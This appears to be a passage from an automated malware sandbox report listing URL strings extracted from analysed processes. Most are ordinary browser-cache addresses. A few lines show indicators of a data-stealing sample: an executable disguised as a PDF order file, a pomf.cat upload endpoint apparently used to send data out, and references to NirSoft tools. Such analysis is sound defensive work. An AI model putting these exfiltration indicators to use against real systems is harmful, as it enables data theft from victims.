Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xJbM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yKf2?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19ylKx?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19ywNG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB46JmN?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB6Ma4a?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBMVUFn?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBRUB0d?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWoHwx?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BByBEMv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://ocsp.digicert.com0
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://ocsp.digicert.com0:
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://ocsp.digicert.com0B
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://ocsp.digicert.com0E
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://ocsp.digicert.com0F
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://ocsp.digicert.com0K
Source: bhvF129.tmp.8.dr | String found in binary or memory: http://ocsp.digicert.com0M
              Source: bhvF129.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0R
              Source: bhvF129.tmp.8.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhvF129.tmp.8.drString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
              Source: bhvF129.tmp.8.drString found in binary or memory: http://ocsp.pki.goog/gsr202
              Source: bhvF129.tmp.8.drString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
              Source: bhvF129.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
              Source: bhvF129.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
              Source: bhvF129.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0-
              Source: bhvF129.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
              Source: bhvF129.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
              Source: AppLaunch.exe, 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.php
              Source: ORDER-NEW....pdf.exe, 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp, AppLaunch.exe, 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.php&https://a.pomf.cat/
              Source: AppLaunch.exe, 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.phpCContent-Disposition:
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-3aac3bb8/directi
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA61Ofl.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA7XCQ3.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AABzUSt.img?h=368&w=622
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsAOZ.img?h=166&w=310
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsZuW.img?h=166&w=310
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuG4N.img?h=75&w=100&
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuQtg.img?h=166&w=310
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTly.img?h=166&w=310
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuY5J.img?h=166&w=310
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuZko.img?h=75&w=100&
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuqZ9.img?h=75&w=100&
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv4Ge.img?h=75&w=100&
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=333&w=311
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhNP.img?h=333&w=311
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvoN9.img?h=166&w=310
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXiwM.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eTok.img?h=75&w=100
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=166&w=31
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18qTPD.img?h=16&w=16&
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=333&w=31
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xJbM.img?h=75&w=100
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yKf2.img?h=250&w=30
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ylKx.img?h=75&w=100
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ywNG.img?h=75&w=100
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB46JmN.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMVUFn.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://support.google.com/accounts/answer/151657
              Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
              Source: bhvF129.tmp.8.drString found in binary or memory: http://www.google.com/
              Source: bhvF129.tmp.8.drString found in binary or memory: http://www.msn.com
              Source: bhvF129.tmp.8.drString found in binary or memory: http://www.msn.com/
              Source: vbc.exe, 00000008.00000003.712390571.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712341279.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712199419.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712142150.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712293496.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712829130.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712034300.00000000022B6000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712693489.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711967368.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712232690.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712081309.00000000022A2000.00000004.00000001.sdmp, bhvF129.tmp.8.drString found in binary or memory: http://www.msn.com/?ocid=iehp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
              Source: bhvF129.tmp.8.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
              Source: vbc.exe, 00000008.00000002.715560522.000000000019C000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: vbc.exe, 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: vbc.exe, 00000008.00000003.712859827.00000000022AF000.00000004.00000001.sdmp, bhvF129.tmp.8.drString found in binary or memory: https://172.217.23.78/
              Source: vbc.exe, 00000008.00000003.712390571.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712341279.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712199419.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712142150.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712293496.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711936953.00000000022B7000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711967368.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712232690.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712081309.00000000022A2000.00000004.00000001.sdmp, bhvF129.tmp.8.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
              Source: bhvF129.tmp.8.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
              Source: AppLaunch.exe, 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmpString found in binary or memory: https://a.pomf.cat/
              Source: bhvF129.tmp.8.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/si?gadsid=AORoGNRfxSclVePPTskt_ULwutuxovZBENP6CQBK41sqxH
              Source: bhvF129.tmp.8.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/si?gadsid=AORoGNSN_Te_GQT33AAAR6UNrVcn3a-PGny50bSNsHlzoT
              Source: bhvF129.tmp.8.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNQXg7AHkvg6J6S0TqGFa_0HynGV3_XxYfs4fLINJG
              Source: bhvF129.tmp.8.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNRxRJyZzZp4KXfYTC7Z4q4fsi2jmRa8YGEqdB288n
              Source: bhvF129.tmp.8.drString found in binary or memory: https://adservice.google.com/adsid/google/si?gadsid=AORoGNSvKHbjRugN8Bruw1IrFif72u8bwsJvZ4BRSrMAhil_
              Source: bhvF129.tmp.8.drString found in binary or memory: https://adservice.google.com/adsid/google/si?gadsid=AORoGNTzML9SvDOPLAOFxwn751k-3cAoAULy2FWuSRb89C_P
              Source: bhvF129.tmp.8.drString found in binary or memory: https://adservice.google.com/adsid/google/ui
              Source: bhvF129.tmp.8.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
              Source: bhvF129.tmp.8.drString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.9Ky5Gf3gP0o.O/m=gapi_iframes
              Source: bhvF129.tmp.8.drString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
              Source: bhvF129.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
              Source: bhvF129.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
              Source: bhvF129.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
              Source: bhvF129.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
              Source: bhvF129.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
              Source: bhvF129.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
              Source: bhvF129.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
              Source: bhvF129.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
              Source: bhvF129.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
              Source: vbc.exe, 00000008.00000003.712390571.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712341279.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712199419.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712142150.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712293496.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711936953.00000000022B7000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711967368.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712232690.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712081309.00000000022A2000.00000004.00000001.sdmp, bhvF129.tmp.8.drString found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
              Source: bhvF129.tmp.8.drString found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
              Source: bhvF129.tmp.8.drString found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591
              Source: bhvF129.tmp.8.drString found in binary or memory: https://contextual.media.net/
              Source: bhvF129.tmp.8.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
              Source: bhvF129.tmp.8.drString found in binary or memory: https://contextual.media.net/__media__/js/util/nrrV9140.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
              Source: bhvF129.tmp.8.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
              Source: bhvF129.tmp.8.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
              Source: bhvF129.tmp.8.drString found in binary or memory: https://cvision.media.net/new/100x75/2/249/241/157/ab7b8862-dfb2-4e59-a214-ff623600dbf5.jpg?v=9
              Source: bhvF129.tmp.8.drString found in binary or memory: https://cvision.media.net/new/100x75/2/89/162/29/8ee7a9a3-dec9-4d15-94e1-5c73b17d2de1.jpg?v=9
              Source: bhvF129.tmp.8.drString found in binary or memory: https://cvision.media.net/new/100x75/3/148/118/158/6d596081-b574-4a8a-9662-8f180c6f659f.jpg?v=9
              Source: bhvF129.tmp.8.drString found in binary or memory: https://cvision.media.net/new/286x175/2/249/241/157/ab7b8862-dfb2-4e59-a214-ff623600dbf5.jpg?v=9
              Source: bhvF129.tmp.8.drString found in binary or memory: https://cvision.media.net/new/286x175/3/148/118/158/6d596081-b574-4a8a-9662-8f180c6f659f.jpg?v=9
              Source: bhvF129.tmp.8.drString found in binary or memory: https://cvision.media.net/new/300x300/2/41/100/83/b5cbfa68-1c93-41c9-8797-4f9b532bc0b6.jpg?v=9
              Source: bhvF129.tmp.8.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
              Source: bhvF129.tmp.8.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhvF129.tmp.8.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B83C84637
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQE7dARJDf70CVtvXguPcFi4kAoAFTTEX3FZ_Kd&s=0
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQEZeIjizh9n8teY_8BOjsYtpLHwSdIq3PT-WQtot4&s=10
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQFso5PEv3c0kRR2gODJUq62DZF6fnxNsqKUTBX-00QeuCR
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQJBttAzO3yKFNSKzEm8qyQoBw2vbSHn0xMB0yhbgc&s=10
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQSkA3BhTLNTXreS8GxkTmsFGydHUKxWR3gtSn5&s=0
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQYaLHOGeTAvxcl2Kvu_RGdrblf1tOpndi7m5_OMgFvfzlI
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQc9-XcC69nXJpriIbLos4bSDdjrz_nByi2zL9xxJ4&s=10
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQcijPNIB_ZGSU0DrjPI_tJ1YOI-6PHUbyHUjTLi3M5nnkK
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQehqYcvOrRcw1YORGnrCzHbNyjMegefhpqYrPQO8G2_KPc
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQyeaAiOCtrhzoyiUuHOZcp67UWv4aYiYIKZ629tWqIyQ_l
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR6qDJUCBqqO8k81oIRUuLKwKNP-ux5oIGn1btf&s=0
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRXMqY1lU5NXqI7H2QRWgHFAYTsfVdew3_6QMhtv0g&s=10
